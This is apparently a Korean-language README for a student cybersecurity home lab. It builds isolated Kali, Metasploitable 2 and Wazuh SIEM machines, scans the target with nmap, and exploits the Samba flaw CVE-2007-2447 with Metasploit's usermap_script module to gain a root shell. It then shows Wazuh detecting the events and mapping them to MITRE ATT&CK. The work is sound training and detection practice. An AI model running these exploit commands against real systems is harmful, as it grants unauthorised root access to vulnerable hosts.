
격리된 AD/Linux 공격 랩: Metasploit을 통해 CVE-2007-2447 악용, Wazuh SIEM으로 탐지 및 MITRE ATT&CK(T1190, T1059)에 매핑
B.Tech 프로젝트 (BTP) | IIIT Pune 기반: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi
무료 오픈소스 도구를 사용하여 단일 머신에 구축한 완전한 기능의 사이버 보안 홈 랩입니다. 이 랩은 실제 공격 수명 주기(정찰 → 악용 → 탐지)를 시뮬레이션하며, SIEM이 공격을 실시간으로 탐지하고 MITRE ATT&CK 프레임워크에 매핑하는 방법을 보여줍니다.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
| VM | 역할 | IP | 도구 |
|---|---|---|---|
| Kali Linux 2026.1 | 공격자 | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | 피해자 | 10.0.0.2 | 20개 이상의 취약점 |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
VirtualBox에서 cyberlab이라는 **내부 네트워크(Internal Network)**를 생성합니다. 세 VM 모두 이 어댑터를 사용합니다. Ubuntu/Wazuh VM에는 브라우저에서 대시보드에 접근할 수 있도록 **호스트 전용 어댑터(Host-Only Adapter)**를 추가로 할당합니다.
cyberlab 내부 네트워크 어댑터 할당# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab 네트워크 할당# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Metasploitable 2를 인터넷에 절대 노출하지 마세요. 의도적으로 보안에 취약하게 만들어졌습니다.
cyberlab 내부 + 호스트 전용(Host-Only)/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (호스트 브라우저에서)Metasploitable 2는 Wazuh 에이전트를 실행할 수 없으므로, 에이전트 없는 모니터링을 위해 syslog 전달을 구성합니다:
Metasploitable에서 /etc/rsyslog.conf에 추가:
*.* @10.0.0.3:514
Wazuh (Ubuntu)에서 /var/ossec/etc/ossec.conf에 syslog 입력을 활성화:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Wazuh 재시작: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Metasploitable 2에서 발견된 주요 서비스:
열린 포트 20개 이상 발견. OS 핑거프린팅 결과: Linux 2.6.x
취약점: CVE-2007-2447 — Samba usermap_script 명령 주입
Samba 3.0.0–3.0.25rc3에서 잘못된 형식의 MS-RPC 요청을 통해 인증 없이 원격 코드 실행을 허용합니다.
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
악용 이후 Wazuh는 이벤트를 자동으로 탐지하여 MITRE ATT&CK에 매핑했습니다:
탐지된 총 이벤트: 55개 이상
대시보드 접속: https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
이 랩은 공격 시뮬레이션 중 인터넷에 연결되지 않은 완전히 격리된 가상 머신으로만 구성됩니다. 모든 도구와 기법은 통제된 환경에서 교육 목적으로만 사용됩니다. 소유하지 않았거나 테스트할 명시적 권한이 없는 시스템에서 어떤 공격 기법도 재현하려 하지 마십시오.
발표: Harshita Verma | IIIT Pune
| 도구 | 버전 | 용도 |
|---|
| VirtualBox | 7.x | 하이퍼바이저 — 단일 호스트에서 모든 VM 실행 |
| Kali Linux | 2026.1 | 침투 테스트 OS (공격용) |
| Metasploitable 2 | v2.0 | 의도적으로 취약하게 만든 대상 |
| Wazuh | v4.7.5 | 오픈소스 SIEM (방어용) |
| Nmap | 최신 | 네트워크/포트 스캐닝 |
| Metasploit Framework | 최신 | 악용 프레임워크 |
| 포트 | 서비스 | 버전 |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| 규칙 ID | 설명 | MITRE 기법 | 전술 |
|---|
| 5402 | ROOT로의 sudo 실행 성공 | T1548.003 | 권한 상승 |
| 5501 | PAM: 로그인 세션 열림 | T1078 | 초기 접근 / 지속성 |
| 5502 | PAM: 로그인 세션 닫힘 | T1078 | 방어 회피 |
| 502 | Wazuh 서버 시작 | — | 탐지 활성 |